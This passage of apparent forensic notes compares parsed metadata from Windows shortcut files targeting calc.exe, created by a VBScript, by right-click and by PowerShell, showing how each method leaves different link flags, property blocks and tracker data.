  C:2018-04-11 21:04:34  M:2018-09-12 21:49:36  A:2018-09-12 21:49:36  System32 (9)
  C:2018-04-11 23:34:38  M:2018-04-11 23:34:38  A:2018-04-11 23:34:38  calc.exe (9)
vol_sn          22D3-06AE
vol_type        Fixed Disk
hotkey          0x14
showcmd         0x4

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasRelativePath

***PropertyStoreDataBlock***
GUID/ID pairs:
{446d16b1-8dad-4870-a748-402ea43d788c}/104
{46588ae2-4cbc-4338-bbfc-139326986dce}/4    SID: S-1-5-21-3855314428-4085452759-4066589348-1000

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : enzo
New Droid ID Time     : Tue Sep 18 10:39:24 2018 UTC
New Droid ID Seq Num  : 7175
New Droid Node ID     : 5c:26:0a:24:29:6f
Birth Droid ID Time   : Tue Sep 18 10:39:24 2018 UTC
Birth Droid ID Seq Num: 7175
Birth Droid Node ID   : 5c:26:0a:24:29:6f

-------------------------------------------------------------------------------------
Visual Basic Script #2

set w = CreateObject("Wscript.shell")
set l = w.CreateShortcut("\foo2.lnk")
l.TargetPath = "c:\windows\system32\calc.exe"
l.Save

Metadata:
guid            {00021401-0000-0000-c000-000000000046}
mtime           Wed Apr 11 23:34:36 2018 Z
atime           Wed Apr 11 23:34:36 2018 Z
ctime           Wed Apr 11 23:34:36 2018 Z
basepath        C:\Windows\System32\calc.exe
shitemidlist    My Computer/C:\/Windows/System32/calc.exe
**Shell Items Details (times in UTC)**
  C:2018-04-11 21:04:34  M:2018-10-11 21:39:08  A:2018-10-11 21:39:08  Windows (9)
  C:2018-04-11 21:04:34  M:2018-12-20 22:46:22  A:2018-12-20 22:46:22  System32 (9)
  C:2018-04-11 23:34:38  M:2018-04-11 23:34:38  A:2018-04-11 23:34:38  calc.exe (9)
vol_sn          22D3-06AE
vol_type        Fixed Disk
hotkey          0x14
showcmd         0x4

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasRelativePath

***PropertyStoreDataBlock***
GUID/ID pairs:
{446d16b1-8dad-4870-a748-402ea43d788c}/104
{46588ae2-4cbc-4338-bbfc-139326986dce}/4    SID: S-1-5-21-3855314428-4085452759-4066589348-1000

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : enzo
New Droid ID Time     : Tue Sep 18 10:39:24 2018 UTC
New Droid ID Seq Num  : 7175
New Droid Node ID     : 5c:26:0a:24:29:6f
Birth Droid ID Time   : Tue Sep 18 10:39:24 2018 UTC
Birth Droid ID Seq Num: 7175
Birth Droid Node ID   : 5c:26:0a:24:29:6f

-------------------------------------------------------------------------------------
Right-click, choose New, then Shortcut

Metadata:
File: d:\cases\lnk\rc_calc.lnk
guid            {00021401-0000-0000-c000-000000000046}
mtime           Wed Apr 11 23:34:36 2018 Z
atime           Wed Apr 11 23:34:36 2018 Z
ctime           Wed Apr 11 23:34:36 2018 Z
workingdir      C:\windows\system32
basepath        C:\Windows\System32\calc.exe
shitemidlist    My Computer/C:\/Windows/System32/calc.exe
**Shell Items Details (times in UTC)**
  C:2018-04-11 21:04:34  M:2019-02-12 22:34:26  A:2019-02-12 22:34:26  Windows (9)
  C:2018-04-11 21:04:34  M:2019-03-25 14:18:14  A:2019-03-25 14:18:14  System32 (9)
  C:2018-04-11 23:34:38  M:2018-04-11 23:34:38  A:2018-04-11 23:34:38  calc.exe (9)
vol_sn          22D3-06AE
vol_type        Fixed Disk
hotkey          0x0
showcmd         0x1

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasLinkInfo|EnableTargetMetadata

***PropertyStoreDataBlock***
GUID/ID pairs:
{28636aa6-953d-11d2-b5d6-00c04fd918d0}/30   ParsingPath: C:\Windows\System32\calc.exe
{446d16b1-8dad-4870-a748-402ea43d788c}/104
{46588ae2-4cbc-4338-bbfc-139326986dce}/4    SID: S-1-5-21-3855314428-4085452759-4066589348-1000
{b725f130-47ef-101a-a5f1-02608c9eebac}/10   ItemNameDisplay: calc.exe
{b725f130-47ef-101a-a5f1-02608c9eebac}/12   Size: 27648
{b725f130-47ef-101a-a5f1-02608c9eebac}/14   DateModified: Wed Apr 11 23:34:36 2018 Z
{b725f130-47ef-101a-a5f1-02608c9eebac}/15   DateCreated : Wed Apr 11 23:34:38 2018 Z
{b725f130-47ef-101a-a5f1-02608c9eebac}/4    ItemType: Application
{dabd30ed-0043-4789-a7f8-d013a4736622}/100  ItemFolderPathDisplay: System32 (C:\Windows)

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : enzo
New Droid ID Time     : Tue Sep 18 10:39:24 2018 UTC
New Droid ID Seq Num  : 7175
New Droid Node ID     : 5c:26:0a:24:29:6f
Birth Droid ID Time   : Tue Sep 18 10:39:24 2018 UTC
Birth Droid ID Seq Num: 7175
Birth Droid Node ID   : 5c:26:0a:24:29:6f


-------------------------------------------------------------------------------------
Use of PowerShell to create a Windows shortcut to calc.exe

$WshShell = New-Object -ComObject WScript.Shell
# WScript.Shell resolves a relative path against the process working directory, not $PWD
$Shortcut = $WshShell.CreateShortcut("ps_calc.lnk")
$Shortcut.TargetPath = "C:\Windows\system32\calc.exe"
$Shortcut.Save()

Metadata:
File: d:\cases\lnk\ps_calc.tst
guid            {00021401-0000-0000-c000-000000000046}
mtime           Wed Apr 11 23:34:36 2018 Z
atime           Wed Apr 11 23:34:36 2018 Z
ctime           Wed Apr 11 23:34:36 2018 Z
basepath        C:\Windows\System32\calc.exe
shitemidlist    My Computer/C:\/Windows/System32/calc.exe
**Shell Items Details (times in UTC)**
  C:2018-04-11 21:04:34  M:2019-02-12 22:34:26  A:2019-02-12 22:34:26  Windows (9)
  C:2018-04-11 21:04:34  M:2019-03-12 23:25:46  A:2019-03-12 23:25:46  System32 (9)
  C:2018-04-11 23:34:38  M:2018-04-11 23:34:38  A:2018-04-11 23:34:38  calc.exe (9)
vol_sn          22D3-06AE
vol_type        Fixed Disk
hotkey          0x0
showcmd         0x1

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasRelativePath

***PropertyStoreDataBlock***
GUID/ID pairs:
{446d16b1-8dad-4870-a748-402ea43d788c}/104
{46588ae2-4cbc-4338-bbfc-139326986dce}/4    SID: S-1-5-21-3855314428-4085452759-4066589348-1000

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : enzo
New Droid ID Time     : Tue Sep 18 10:39:24 2018 UTC
New Droid ID Seq Num  : 7175
New Droid Node ID     : 5c:26:0a:24:29:6f
Birth Droid ID Time   : Tue Sep 18 10:39:24 2018 UTC
Birth Droid ID Seq Num: 7175
Birth Droid Node ID   : 5c:26:0a:24:29:6f

--------------------------------------------------------------------------------